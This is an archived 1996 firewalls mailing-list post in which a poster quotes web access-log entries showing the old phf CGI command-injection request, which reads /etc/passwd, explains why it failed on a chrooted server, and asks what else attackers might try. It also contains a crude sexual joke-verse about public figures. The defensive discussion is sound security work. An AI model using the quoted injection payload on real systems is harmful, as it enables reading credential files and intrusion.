Great Circle Associates Firewalls
(July 1996)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: Dirty dogs
From: meowmyx @ morebbs . com
Organization: MORE BBS
Date: Wed, 10 Jul 96 15:28:54
To: firewalls @ greatcircle . com

I was browsing through the system files of a web server that sits outside a
firewall   There were a couple of interesting entries in the access log

960412access:198.69.26.81  - - [12/Apr/1996:04;24;42 -0400]
"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400]
"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207

This didnt work for two reasons   One there is no phf program in the system
Two the cgi application gateway is running chrooted

I am not really very good at understanding this hacking and cracking stuff
What else could they have tried that might have worked

FlameThrower>> ON

The Mayor of White Water, had a very pretty daughter,
Her name was Sweet Hillary, she was eager to please.

Although lovely Hillary, wore clothes that were billowy,
The hairs on her dickey die doe, hung down to her knees.

One black one, one white one, and one that Bill caught a trout on,
The hairs on her dickey die doe, hung down to her knees.

If she were my daughter, I would have cut them much shorter,
The hairs on her dickey die doe, hung down to her knees.

Ooops   Damn   Slightly singed left whiskers   FlameThrower>> OFF

                                        MeOwMyX



Follow-Ups:
Indexed By Date Previous: Re: Well Known Port Numbers
From: chip @ ftp . com (Chip Sparling)
Next: Re: Re[2]: Newbie Cisco Access-List Question
From: Ryan.Russell/SYBASE
Indexed By Thread Previous: [no subject]
From: "Gary G. Hull" <ggh14854 @ ussun2f . glaxo . com>
Next: Re: Dirty dogs
From: Paul Danckaert <pauld @ umbc . edu>

Google
 
Search Internet Search www.greatcircle.com